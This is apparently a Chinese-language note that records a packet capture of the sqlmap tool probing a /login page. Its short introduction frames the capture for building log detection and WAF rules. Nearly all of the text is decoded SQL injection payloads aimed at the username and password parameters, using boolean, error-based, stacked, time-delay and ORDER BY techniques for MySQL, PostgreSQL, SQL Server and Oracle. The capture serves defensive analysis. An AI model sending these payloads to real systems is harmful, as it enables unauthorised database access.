
sqlmap抓包

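用 tcpdump 抓包,在 wireshark 中导出为 text,再做 urldecode 解码,得到 sqlmap 对 /login 的 username、password 两个参数依次发出的探测请求(见下)。下面是解码后的文本,实际报文中的空格、引号等字符是百分号编码的。可以看出这次扫描同时尝试了 MySQL(EXTRACTVALUE、SLEEP)、PostgreSQL(PG_SLEEP、::text)、SQL Server(WAITFOR DELAY、CHAR()+)和 Oracle(DBMS_PIPE.RECEIVE_MESSAGE、XMLType、FROM DUAL)的写法;其中 qvjkq/qzkjq(即 0x71766a6b71/0x717a6b6a71)是 sqlmap 每次运行随机生成的定界符,做日志检测或 WAF 规则时应匹配这类语句结构和函数名,而不是这两个固定字符串。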

GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=2795&password=123 HTTP/1.1 
GET /login?username=abc((),",),.'&password=123 HTTP/1.1 
GET /login?username=abc'VOhiEk<'">ULNwju&password=123 HTTP/1.1 
GET /login?username=abc') AND 2781=9607 AND ('Rnuk'='Rnuk&password=123 HTTP/1.1 
GET /login?username=abc' AND 2247=4788 AND 'ddJs'='ddJs&password=123 HTTP/1.1 
GET /login?username=abc) AND 6875=6686 AND (3318=3318&password=123 HTTP/1.1 
GET /login?username=abc AND 3033=6740&password=123 HTTP/1.1 
GET /login?username=abc AND 9516=5869-- dooX&password=123 HTTP/1.1 
GET /login?username=(SELECT (CASE WHEN (2922=6853) THEN 'abc' ELSE (SELECT 6853 UNION SELECT 6863) END))&password=123 HTTP/1.1 
GET /login?username=abc') AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND ('WLxo'='WLxo&password=123 HTTP/1.1 
GET /login?username=abc' AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND 'EnIq'='EnIq&password=123 HTTP/1.1 
GET /login?username=abc) AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND (1539=1539&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))-- Zpqd&password=123 HTTP/1.1 
GET /login?username=abc') AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('yoJQ'='yoJQ&password=123 HTTP/1.1 
GET /login?username=abc' AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'rRrm'='rRrm&password=123 HTTP/1.1 
GET /login?username=abc) AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (9921=9921&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- MRHt&password=123 HTTP/1.1 
GET /login?username=abc') AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('uWsT'='uWsT&password=123 HTTP/1.1 
GET /login?username=abc' AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'autW'='autW&password=123 HTTP/1.1 
GET /login?username=abc) AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (6576=6576&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- bXtg&password=123 HTTP/1.1 
GET /login?username=abc') AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('VlYe'='VlYe&password=123 HTTP/1.1 
GET /login?username=abc' AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'XgIT'='XgIT&password=123 HTTP/1.1 
GET /login?username=abc) AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (6471=6471&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- IRUY&password=123 HTTP/1.1 
GET /login?username=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (6090=6090) THEN '1' ELSE '0' END)),'qzkjq'))&password=123 HTTP/1.1 
GET /login?username=abc');SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc');WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc';WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc);WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc;WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc') AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND ('BoHR'='BoHR&password=123 HTTP/1.1 
GET /login?username=abc' AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND 'IFHW'='IFHW&password=123 HTTP/1.1 
GET /login?username=abc) AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND (2757=2757&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)-- zwZm&password=123 HTTP/1.1 
GET /login?username=abc') AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND ('CuGS'='CuGS&password=123 HTTP/1.1 
GET /login?username=abc' AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND 'WmPH'='WmPH&password=123 HTTP/1.1 
GET /login?username=abc) AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND (6554=6554&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))-- OgwJ&password=123 HTTP/1.1 
GET /login?username=abc') WAITFOR DELAY '0:0:5' AND ('jCFc'='jCFc&password=123 HTTP/1.1 
GET /login?username=abc' WAITFOR DELAY '0:0:5' AND 'FpFX'='FpFX&password=123 HTTP/1.1 
GET /login?username=abc) WAITFOR DELAY '0:0:5' AND (7644=7644&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'-- sPYO&password=123 HTTP/1.1 
GET /login?username=abc') AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND ('BmJW'='BmJW&password=123 HTTP/1.1 
GET /login?username=abc' AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND 'svZV'='svZV&password=123 HTTP/1.1 
GET /login?username=abc) AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND (8259=8259&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)-- tkiR&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 1-- xBKA&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 2552-- QaqN&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 1-- CXec&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 5386-- OCdf&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 1-- qihI&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 8561-- muFp&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- zHug&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 6155-- jbRk&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- JNHc&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 7301-- lLsH&password=123 HTTP/1.1 
GET /login?username=abc&password=1760 HTTP/1.1 
GET /login?username=abc&password=123).),"')((. HTTP/1.1 
GET /login?username=abc&password=123'JHsedc<'">YLcugw HTTP/1.1 
GET /login?username=abc&password=123) AND 9079=5601 AND (1335=1335 HTTP/1.1 
GET /login?username=abc&password=123 AND 1857=7867 HTTP/1.1 
GET /login?username=abc&password=123 AND 8511=5177-- pZVc HTTP/1.1 
GET /login?username=abc&password=123') AND 7997=8676 AND ('HkRV'='HkRV HTTP/1.1 
GET /login?username=abc&password=123' AND 1648=3770 AND 'QrJb'='QrJb HTTP/1.1 
GET /login?username=abc&password=(SELECT (CASE WHEN (5600=9308) THEN 123 ELSE (SELECT 9308 UNION SELECT 4757) END)) HTTP/1.1 
GET /login?username=abc&password=123) AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND (8074=8074 HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71))-- mRSf HTTP/1.1 
GET /login?username=abc&password=123') AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND ('hMli'='hMli HTTP/1.1 
GET /login?username=abc&password=123' AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND 'PpkB'='PpkB HTTP/1.1 
GET /login?username=abc&password=123) AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (7589=7589 HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- AWtz HTTP/1.1 
GET /login?username=abc&password=123') AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('Kndh'='Kndh HTTP/1.1 
GET /login?username=abc&password=123' AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'ynpj'='ynpj HTTP/1.1 
GET /login?username=abc&password=123) AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (4254=4254 HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- Cppc HTTP/1.1 
GET /login?username=abc&password=123') AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('jrda'='jrda HTTP/1.1 
GET /login?username=abc&password=123' AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'Hxec'='Hxec HTTP/1.1 
GET /login?username=abc&password=123) AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (3323=3323 HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- ipPa HTTP/1.1 
GET /login?username=abc&password=123') AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('LKje'='LKje HTTP/1.1 
GET /login?username=abc&password=123' AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'qtMI'='qtMI HTTP/1.1 
GET /login?username=abc&password=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (8658=8658) THEN '1' ELSE '0' END)),'qzkjq')) HTTP/1.1 
GET /login?username=abc&password=123);SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT PG_SLEEP(5)-- HTTP/1.1 
GET /login?username=abc&password=123);WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123;WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123');WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123';WAITFOR DELAY '0:0:5'-- HTTP/1.1 
GET /login?username=abc&password=123);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(78)||CHR(107)||CHR(76),5) FROM DUAL-- HTTP/1.1 
GET /login?username=abc&password=123) AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND (5534=5534 HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) HTTP/1.1 
GET /login?username=abc&password=123 AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG)-- wyKY HTTP/1.1 
GET /login?username=abc&password=123') AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND ('doQl'='doQl HTTP/1.1 
GET /login?username=abc&password=123' AND (SELECT 9433 FROM (SELECT(SLEEP(5)))UOBG) AND 'IMvM'='IMvM HTTP/1.1 
GET /login?username=abc&password=123) AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND (8248=8248 HTTP/1.1 
GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) HTTP/1.1 
GET /login?username=abc&password=123 AND 1515=(SELECT 1515 FROM PG_SLEEP(5))-- PgeE HTTP/1.1 
GET /login?username=abc&password=123') AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND ('OoDW'='OoDW HTTP/1.1 
GET /login?username=abc&password=123' AND 1515=(SELECT 1515 FROM PG_SLEEP(5)) AND 'Zqlk'='Zqlk HTTP/1.1 
GET /login?username=abc&password=123) WAITFOR DELAY '0:0:5' AND (6147=6147 HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5' HTTP/1.1 
GET /login?username=abc&password=123 WAITFOR DELAY '0:0:5'-- hVmx HTTP/1.1 
GET /login?username=abc&password=123') WAITFOR DELAY '0:0:5' AND ('oDNw'='oDNw HTTP/1.1 
GET /login?username=abc&password=123' WAITFOR DELAY '0:0:5' AND 'tWTl'='tWTl HTTP/1.1 
GET /login?username=abc&password=123) AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND (5787=5787 HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) HTTP/1.1 
GET /login?username=abc&password=123 AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5)-- Djiq HTTP/1.1 
GET /login?username=abc&password=123') AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND ('Lyac'='Lyac HTTP/1.1 
GET /login?username=abc&password=123' AND 4878=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(70)||CHR(77)||CHR(108),5) AND 'APIe'='APIe HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 1-- TMmJ HTTP/1.1 
GET /login?username=abc&password=123) ORDER BY 9030-- RTTw HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- mDvA HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1200-- eNbW HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 1-- sYTq HTTP/1.1 
GET /login?username=abc&password=123 ORDER BY 8916-- lILp HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 1-- AOfY HTTP/1.1 
GET /login?username=abc&password=123') ORDER BY 6451-- Hzva HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 1-- Pauy HTTP/1.1 
GET /login?username=abc&password=123' ORDER BY 9918-- mEOJ HTTP/1.1 

tools, sqlmap
